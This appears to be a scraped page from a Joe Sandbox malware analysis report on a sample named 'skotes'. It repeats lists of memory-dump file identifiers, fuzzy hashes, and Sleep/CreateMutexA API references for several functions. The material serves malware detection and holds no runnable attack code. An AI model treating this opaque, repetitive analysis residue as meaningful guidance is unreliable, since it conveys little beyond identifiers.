Associated: 00000001.00000002.1764469090.0000000000F20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764486811.0000000000F82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764632061.0000000000F89000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764651952.0000000000F8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764699572.0000000000F97000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765407891.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765584405.00000000010F4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765871305.0000000001116000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765944083.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766080956.0000000001119000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766154075.000000000111A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766218614.0000000001123000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766318694.0000000001128000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766444780.000000000113A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766538376.000000000113B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766631836.000000000113E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766711551.000000000113F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767052544.0000000001140000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767154042.0000000001141000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767197130.0000000001142000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767219062.0000000001154000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767239174.0000000001169000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767255320.000000000116B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767273611.0000000001172000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767292973.0000000001179000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767312917.000000000117A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767352309.0000000001182000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767419167.0000000001194000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767479718.0000000001196000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767521370.000000000119E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767542098.00000000011A2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767578961.00000000011A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767644452.00000000011A7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767665829.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767712234.00000000011B0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767754474.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767771677.00000000011C0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767794038.00000000011DF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011E0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767848196.0000000001219000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767865409.000000000121A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767880642.000000000121B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767897134.000000000121F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767912523.0000000001221000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767929458.000000000122F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767944890.0000000001230000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 6d152e8cbac8a4b842b69934778eaa4cb3bb861735f3156df72c575a40ac23c5
Instruction ID: 0baac06722d26ae3e20e487bd2f583eb81a92c89564e6e90dd59b7a2fde9ea4e
Opcode Fuzzy Hash: 6d152e8cbac8a4b842b69934778eaa4cb3bb861735f3156df72c575a40ac23c5
Instruction Fuzzy Hash: 9D313931A00210DBFB08DB78ED8976DB7A2EFC6320F244218E014EB3D5D77A99C0A712

Function 00F2A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F2A963
CreateMutexA.KERNELBASE(00000000,00000000,00F83254), ref: 00F2A981

Memory Dump Source

Source File: 00000001.00000002.1764486811.0000000000F21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000001.00000002.1764469090.0000000000F20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764486811.0000000000F82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764632061.0000000000F89000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764651952.0000000000F8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764699572.0000000000F97000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765407891.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765584405.00000000010F4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765871305.0000000001116000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765944083.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766080956.0000000001119000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766154075.000000000111A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766218614.0000000001123000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766318694.0000000001128000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766444780.000000000113A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766538376.000000000113B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766631836.000000000113E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766711551.000000000113F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767052544.0000000001140000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767154042.0000000001141000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767197130.0000000001142000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767219062.0000000001154000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767239174.0000000001169000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767255320.000000000116B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767273611.0000000001172000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767292973.0000000001179000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767312917.000000000117A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767352309.0000000001182000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767419167.0000000001194000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767479718.0000000001196000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767521370.000000000119E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767542098.00000000011A2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767578961.00000000011A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767644452.00000000011A7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767665829.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767712234.00000000011B0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767754474.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767771677.00000000011C0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767794038.00000000011DF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011E0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767848196.0000000001219000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767865409.000000000121A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767880642.000000000121B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767897134.000000000121F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767912523.0000000001221000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767929458.000000000122F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767944890.0000000001230000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 2a40e20a7177a55b211765259f7b8c917d442333f38518d706f79d4023c38488
Instruction ID: aa1a5e4daa8461f71638b56909161c6b29ed9f69938f86857e19b25652d45cd9
Opcode Fuzzy Hash: 2a40e20a7177a55b211765259f7b8c917d442333f38518d706f79d4023c38488
Instruction Fuzzy Hash: 14315D31A001109BEB08EB7CEC8D76DB7A2EFC1324F244218E414DB3E5D77999C0A752

Function 00F2A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F2A963
CreateMutexA.KERNELBASE(00000000,00000000,00F83254), ref: 00F2A981

Memory Dump Source

Source File: 00000001.00000002.1764486811.0000000000F21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000001.00000002.1764469090.0000000000F20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764486811.0000000000F82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764632061.0000000000F89000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764651952.0000000000F8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764699572.0000000000F97000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765407891.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765584405.00000000010F4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765871305.0000000001116000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765944083.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766080956.0000000001119000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766154075.000000000111A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766218614.0000000001123000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766318694.0000000001128000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766444780.000000000113A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766538376.000000000113B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766631836.000000000113E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766711551.000000000113F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767052544.0000000001140000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767154042.0000000001141000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767197130.0000000001142000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767219062.0000000001154000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767239174.0000000001169000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767255320.000000000116B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767273611.0000000001172000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767292973.0000000001179000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767312917.000000000117A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767352309.0000000001182000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767419167.0000000001194000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767479718.0000000001196000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767521370.000000000119E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767542098.00000000011A2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767578961.00000000011A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767644452.00000000011A7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767665829.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767712234.00000000011B0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767754474.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767771677.00000000011C0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767794038.00000000011DF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011E0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767848196.0000000001219000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767865409.000000000121A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767880642.000000000121B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767897134.000000000121F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767912523.0000000001221000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767929458.000000000122F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767944890.0000000001230000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 05e7af8ffd3ed0adda32b6460d2d3a05781743db6539a5c87e03b10e0302f738
Instruction ID: d26814fe7b73eba099bcd8d0f22685693af54fc763b3b300306c245d8573ec3f
Opcode Fuzzy Hash: 05e7af8ffd3ed0adda32b6460d2d3a05781743db6539a5c87e03b10e0302f738
Instruction Fuzzy Hash: C4313B31A001149BEB08DB78ED8A76DB7A2EFC5724F244218E414DB3D5DB799D80B712

Function 00F2A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F2A963
CreateMutexA.KERNELBASE(00000000,00000000,00F83254), ref: 00F2A981

Memory Dump Source

Source File: 00000001.00000002.1764486811.0000000000F21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000001.00000002.1764469090.0000000000F20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764486811.0000000000F82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764632061.0000000000F89000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764651952.0000000000F8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764699572.0000000000F97000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765407891.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765584405.00000000010F4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765871305.0000000001116000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765944083.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766080956.0000000001119000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766154075.000000000111A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766218614.0000000001123000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766318694.0000000001128000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766444780.000000000113A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766538376.000000000113B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766631836.000000000113E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766711551.000000000113F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767052544.0000000001140000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767154042.0000000001141000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767197130.0000000001142000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767219062.0000000001154000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767239174.0000000001169000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767255320.000000000116B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767273611.0000000001172000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767292973.0000000001179000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767312917.000000000117A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767352309.0000000001182000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767419167.0000000001194000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767479718.0000000001196000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767521370.000000000119E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767542098.00000000011A2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767578961.00000000011A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767644452.00000000011A7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767665829.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767712234.00000000011B0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767754474.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767771677.00000000011C0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767794038.00000000011DF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011E0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767848196.0000000001219000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767865409.000000000121A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767880642.000000000121B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767897134.000000000121F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767912523.0000000001221000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767929458.000000000122F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767944890.0000000001230000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 159b7c416f6226d027daad351a0a4253010ba78d86abc93d781c7bb906bca5a1
Instruction ID: 83bfe4578bde09660e1a0e6c0facae54de93c51749821341da44d19c5191efaf
Opcode Fuzzy Hash: 159b7c416f6226d027daad351a0a4253010ba78d86abc93d781c7bb906bca5a1
Instruction Fuzzy Hash: 4C314B31A00214DBEF08DB78ED8976DB7B2EFC1324F248218E414EB3D5D7799980A756

Function 00F29ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F2A963
CreateMutexA.KERNELBASE(00000000,00000000,00F83254), ref: 00F2A981

Memory Dump Source

Source File: 00000001.00000002.1764486811.0000000000F21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000001.00000002.1764469090.0000000000F20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764486811.0000000000F82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764632061.0000000000F89000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764651952.0000000000F8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764699572.0000000000F97000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765407891.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765584405.00000000010F4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765871305.0000000001116000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765944083.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766080956.0000000001119000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766154075.000000000111A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766218614.0000000001123000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766318694.0000000001128000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766444780.000000000113A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766538376.000000000113B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766631836.000000000113E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766711551.000000000113F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767052544.0000000001140000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767154042.0000000001141000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767197130.0000000001142000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767219062.0000000001154000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767239174.0000000001169000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767255320.000000000116B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767273611.0000000001172000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767292973.0000000001179000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767312917.000000000117A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767352309.0000000001182000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767419167.0000000001194000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767479718.0000000001196000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767521370.000000000119E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767542098.00000000011A2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767578961.00000000011A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767644452.00000000011A7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767665829.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767712234.00000000011B0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767754474.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767771677.00000000011C0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767794038.00000000011DF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011E0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767848196.0000000001219000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767865409.000000000121A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767880642.000000000121B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767897134.000000000121F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767912523.0000000001221000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767929458.000000000122F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767944890.0000000001230000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 1b17b819fed7b630b6276d7cf208ae54aa2c8a81b0176b95d7d677b2a9437dac
Instruction ID: 1be06d293ab1ace462e44d7006818f19da7ac4ec9fd5c008eb5af40f630de77a
Opcode Fuzzy Hash: 1b17b819fed7b630b6276d7cf208ae54aa2c8a81b0176b95d7d677b2a9437dac
Instruction Fuzzy Hash: A1212C31A04210DBEB189B69FC8976CB7A2EBC1720F24421DE518DB2D5D7BA5980A712

Function 00F2A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F2A963
CreateMutexA.KERNELBASE(00000000,00000000,00F83254), ref: 00F2A981

Memory Dump Source

Source File: 00000001.00000002.1764486811.0000000000F21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F20000, based on PE: true

